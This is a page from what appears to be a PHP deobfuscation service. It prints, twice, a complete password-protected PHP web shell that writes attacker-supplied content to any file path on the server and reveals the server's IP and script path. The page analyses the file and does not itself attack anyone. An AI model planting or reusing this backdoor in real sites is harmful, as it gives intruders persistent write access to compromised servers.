Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<html> <head> <title>IP <?=$_SERVER['SERVER_NAME']?></title> </head> <style> body{fon..

Decoded Output download

<html>
<head>
<title>IP <?=$_SERVER['SERVER_NAME']?></title>
</head>
<style>
body{font-family:Georgia;}
#neirong{width:558px;height:250px;border=#0000 1px solid}
#lujing{font-family:Georgia;width:389px;border=#0000 1px solid}
#shc{font-family:Georgia;background:#fff;width:63px;height:20px;border=#0000 1px solid}
</style>
<body bgcolor="black">
<?php
$password="keio";/****/
if ($_GET[pass]==$password){
  if ($_POST)
{
  $fo=fopen($_POST["lujing"],"w");
  if(fwrite($fo,$_POST["neirong"]))
   echo "<font color=red><b>!</b></font>";
  else
   echo "<font color=#33CCFF><b></b></font>";
  
}
else{
echo "<font color=#CCFFFF>php</font>";
}
?><br><br>
<font color="#FFFF33">IP<?=$_SERVER['SERVER_NAME']?>(<?=@gethostbyname($_SERVER['SERVER_NAME'])?>)<br>
:<?php echo $_SERVER["SCRIPT_FILENAME"]?>
<form action="" method="post">
:<input type="text" name="lujing" id="lujing" value='<?php echo $_SERVER["SCRIPT_FILENAME"]?>' />
<input type="submit" id="shc" value="" /><br />
<textarea name="neirong" id="neirong">
</textarea>
</form></font>
<?php
 }else{
?>
<form action="" method="GET">
<font color="#00FFCC">:<input type="password" name="pass" id="pass">


<input type="submit" name="denglu" value="" /></form>
<?php } ?>

Did this file decode correctly?

Original Code

<html>
<head>
<title>IP <?=$_SERVER['SERVER_NAME']?></title>
</head>
<style>
body{font-family:Georgia;}
#neirong{width:558px;height:250px;border=#0000 1px solid}
#lujing{font-family:Georgia;width:389px;border=#0000 1px solid}
#shc{font-family:Georgia;background:#fff;width:63px;height:20px;border=#0000 1px solid}
</style>
<body bgcolor="black">
<?php
$password="keio";/****/
if ($_GET[pass]==$password){
  if ($_POST)
{
  $fo=fopen($_POST["lujing"],"w");
  if(fwrite($fo,$_POST["neirong"]))
   echo "<font color=red><b>!</b></font>";
  else
   echo "<font color=#33CCFF><b></b></font>";
  
}
else{
echo "<font color=#CCFFFF>php</font>";
}
?><br><br>
<font color="#FFFF33">IP<?=$_SERVER['SERVER_NAME']?>(<?=@gethostbyname($_SERVER['SERVER_NAME'])?>)<br>
:<?php echo $_SERVER["SCRIPT_FILENAME"]?>
<form action="" method="post">
:<input type="text" name="lujing" id="lujing" value='<?php echo $_SERVER["SCRIPT_FILENAME"]?>' />
<input type="submit" id="shc" value="" /><br />
<textarea name="neirong" id="neirong">
</textarea>
</form></font>
<?php
 }else{
?>
<form action="" method="GET">
<font color="#00FFCC">:<input type="password" name="pass" id="pass">


<input type="submit" name="denglu" value="" /></form>
<?php } ?>

Function Calls

None

Variables

$password keio

Stats

MD5 03ece5c6dfce096f4b9e88528a69b7ef
Eval Count 0
Decode Time 109 ms